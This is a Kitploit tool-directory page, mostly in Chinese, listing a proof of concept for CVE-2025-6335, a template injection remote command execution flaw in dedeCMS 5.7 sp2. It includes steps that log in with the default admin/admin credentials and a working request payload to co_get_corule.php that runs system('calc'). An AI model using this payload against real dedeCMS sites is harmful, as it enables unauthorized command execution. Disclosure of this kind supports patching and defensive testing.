Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-6335 — CVE-2025-6335 概念验证利用程序,针对 dedeCMS 5.7 sp2 中的模板注入命令执行漏洞,可通过后台接口实现任意命令执行。 | Kitploit
工具/GitHubGitHub/jujubooom/cve-2025-6335
漏洞分析代码分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubjujubooom/cve-2025-6335

CVE-2025-6335

CVE-2025-6335 概念验证利用程序,针对 dedeCMS 5.7 sp2 中的模板注入命令执行漏洞,可通过后台接口实现任意命令执行。

查看仓库
611年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Title: Template injection command execution vulnerability in dedeCMS 5.7 sp2

BUG_Author: Ewoji

Affected Version: dedeCMS < 5.7.2

Vendor: Shanghai Zhuozhuo Network Technology Co., LTD

Software: dedeCMS

Vulnerability Files:

  • /include/dedetag.class.php

Description:

  1. After install,Log in to the background

    • Use the default account password admin/admin
  2. Exploiting the Template

    • Access the dede/co_get_corule.php interface
    • Pass in the parameter /dede/co_get_corule.php? notes={dede:"); system('calc'); ///}&job=1,Accessing twice like this can execute the command
  3. Verifying the Exploit:

    • If the injection is successful,The attacker will execute arbitrary commands

Proof of Concept:

root@kitploit:~
/dede/co_get_corule.php?notes={dede:");system('calc');///}&job=1
Accessing twice like this can execute the command

detail:CVE-2025-6335-dedeCMS后台模板注入RCE

下载工具